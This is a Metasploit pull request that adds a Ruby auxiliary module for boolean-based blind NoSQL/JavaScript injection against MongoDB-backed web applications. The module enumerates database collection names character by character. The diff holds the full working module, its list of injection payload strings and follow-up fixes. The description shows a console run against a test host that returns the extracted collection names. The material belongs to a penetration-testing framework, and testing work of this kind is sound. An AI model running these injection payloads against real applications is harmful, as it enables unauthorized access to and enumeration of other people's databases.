### PR TITLE
Generic MongoDB javascript injection collection enumeration

### DIFF
--- a/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb
+++ b/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb
@@ -119,7 +119,7 @@ class Metasploit4 < Msf::Auxiliary
       vprint_status("Getting collection #{i}'s name")
 
       name = ''
-      (0..name_len).each do |k|
+      (0..name_len-1).each do |k|
         [*('a'..'z'),*('0'..'9')].each do |c|
           str = "db.getCollectionNames()[#{i}][#{k}]=='#{c}'"
           res = send_request_cgi({

--- a/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb
+++ b/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb
@@ -33,10 +33,10 @@ class Metasploit4 < Msf::Auxiliary
   end
 
   def syntaxes
-    [['";return+true;var+foo="', '";return+[inject];var+foo="'],
-     ["';return+true;var+foo='", "';return+[inject];var+foo='"],
-     ["'||this||'", "'||[inject]||'"],
-     ['"||this||"','"||[inject]||"'],
+    [["\"'||this||'", "'||[inject]||'"],
+     ["\"';return+true;var+foo='", "';return+[inject];var+foo='"],
+     ['\'"||this||"','"||[inject]||"'],
+     ['\'";return+true;var+foo="', '";return+[inject];var+foo="'],
      ["||this","||[inject]"]]
   end
 
@@ -64,17 +64,17 @@ class Metasploit4 < Msf::Auxiliary
       if res and res.body != fals and res.code == 200
         print_status("Looks like " + payload[0] + " works")
         tru = res.body
-      end
 
-      res = send_request_cgi({
-        'uri' => uri.sub('[NoSQLi]', payload[0].sub('true', 'false').sub('this', '!this'))
-      })
+        res = send_request_cgi({
+          'uri' => uri.sub('[NoSQLi]', payload[0].sub('true', 'false').sub('this', '!this'))
+        })
 
-      if res and res.body != tru and res.code == 200
-        vprint_status("I think I confirmed with a negative test.")
-        fals = res.body
-        pay = payload[1]
-        break
+        if res and res.body != tru and res.code == 200
+          vprint_status("I think I confirmed with a negative test.")
+          fals = res.body
+          pay = payload[1]
+          break
+        end
       end
     end
 

--- a/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb
+++ b/modules/auxiliary/gather/mongodb_js_inject_collection_enum.rb
@@ -1,0 +1,123 @@
+##
+## This module requires Metasploit: http//metasploit.com/download
+## Current source: https://github.com/rapid7/metasploit-framework
+###
+
+require 'msf/core'
+
+class Metasploit4 < Msf::Auxiliary
+  Rank = GoodRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "MongoDB NoSQL Collection Enumeration Via Injection",
+      'Description'    => %q{
+      This module can exploit NoSQL injections on MongoDB versions less than 2.4
+      and enumerate the collections available in the data via boolean injections.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        ['Brandon Perry <bperry.volatile@gmail.com>'],
+      'References'     =>
+        [['URL', 'http://nosql.mypopescu.com/post/14453905385/attacking-nosql-and-node-js-server-side-javascript']],
+      'Platform'       => ['linux', 'win'],
+      'Privileged'     => false,
+      'DisclosureDate' => "Jun 7 2014"))
+
+      register_options(
+      [
+        OptString.new('TARGETURI', [ true, 'Full vulnerable URI with [NoSQLi] where the injection point is', '/index.php?age=50[NoSQLi]'])
+      ], self.class)
+  end
+
+  def syntaxes
+    [['";return+true;var+foo="', '";return+[inject];var+foo="'],
+     ["';return+true;var+foo='", "';return+[inject];var+foo='"],
+     ["'||this||'", "'||[inject]||'"],
+     ['"||this||"','"||[inject]||"'],
+     ["||this","||[inject]"]]
+  end
+
+  def run
+    uri = datastore['TARGETURI']
+
+    res = send_request_cgi({
+      'uri' => uri.sub('[NoSQLi]', '')
+    })
+
+    pay = ""
+    fals = res.body
+    tru = nil
+
+    syntaxes.each do |payload|
+      print_status("Testing " + payload[0])
+      res = send_request_cgi({
+        'uri' => uri.sub('[NoSQLi]', payload[0])
+      })
+
+      if res.body != fals and res.code == 200
+        print_status("Looks like " + payload[0] + " works")
+        tru = res.body
+        pay = payload[1]
+        break
+      end
+    end
+
+    length = 0
+    vprint_status("Getting length of the number of collections.")
+    (0..100).each do |len|
+      str = "db.getCollectionNames().length==#{len}"
+      res = send_request_cgi({
+        'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
+      })
+
+      if res.body == tru
+        length = len
+        print_status("#{len} collections are available")
+        break
+      end
+    end
+
+    vprint_status("Getting collection names")
+
+    (0..length-1).each do |i|
+      vprint_status("Getting length of name for collection " + i.to_s)
+
+      name_len = 0
+      (0..100).each do |k|
+        str = "db.getCollectionNames()[#{i}].length==#{k}"
+        res = send_request_cgi({
+          'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
+        })
+
+        if res.body == tru
+          name_len = k
+          print_status("Length of collection #{i}'s name is #{k}")
+          break
+        end
+      end
+
+      vprint_status("Getting collection #{i}'s name")
+
+      name = ''
+      (0..name_len).each do |k|
+        [*('a'..'z'),*('0'..'9')].each do |c|
+          str = "db.getCollectionNames()[#{i}][#{k}]=='#{c}'"
+          res = send_request_cgi({
+            'uri' => uri.sub('[NoSQLi]', pay.sub('[inject]', str))
+          })
+
+          if res.body == tru
+            name << c
+            break
+          end
+        end
+      end
+
+      print_status ("Collections #{i}'s name is " + name)
+    end
+
+  end
+end


### PR DESCRIPTION
This module was tested against a small php application I wrote interfacing with MongoDB 2.2.7. It should be generic enough to work against a few injection vectors. It is based on a vuln I found in an un-named application. The code was inspired by official php documentation example three.

https://gist.github.com/brandonprry/c2de8ac2be825007c4de
http://www.php.net//manual/en/mongocollection.find.php

The technique used to enumerate the collections is only available in version of MongoDB prior to 2.4. I tested against MongoDB 2.2.7.

```
msf auxiliary(nosql_injection_collection_enum) > show options

Module options (auxiliary/gather/nosql_injection_collection_enum):

   Name       Current Setting               Required  Description
   ----       ---------------               --------  -----------
   Proxies                                  no        Use a proxy chain
   RHOST      192.168.1.128                 yes       The target address
   RPORT      8080                          yes       The target port
   TARGETURI  /index.php?race=fdsa[NoSQLi]  yes       Full vulnerable URI with [NoSQLi] where the injection point is
   VHOST                                    no        HTTP server virtual host

msf auxiliary(nosql_injection_collection_enum) > run

[*] Testing ";return+true;var+foo="
[*] Testing ';return+true;var+foo='
[*] Testing '||this||'
[*] Looks like '||this||' works
[*] 2 collections are available
[*] Length of collection 0's name is 9
[*] Collections 0's name is phpmanual
[*] Length of collection 1's name is 14
[*] Collections 1's name is systemindexes
[*] Auxiliary module execution completed
msf auxiliary(nosql_injection_collection_enum) > 
```
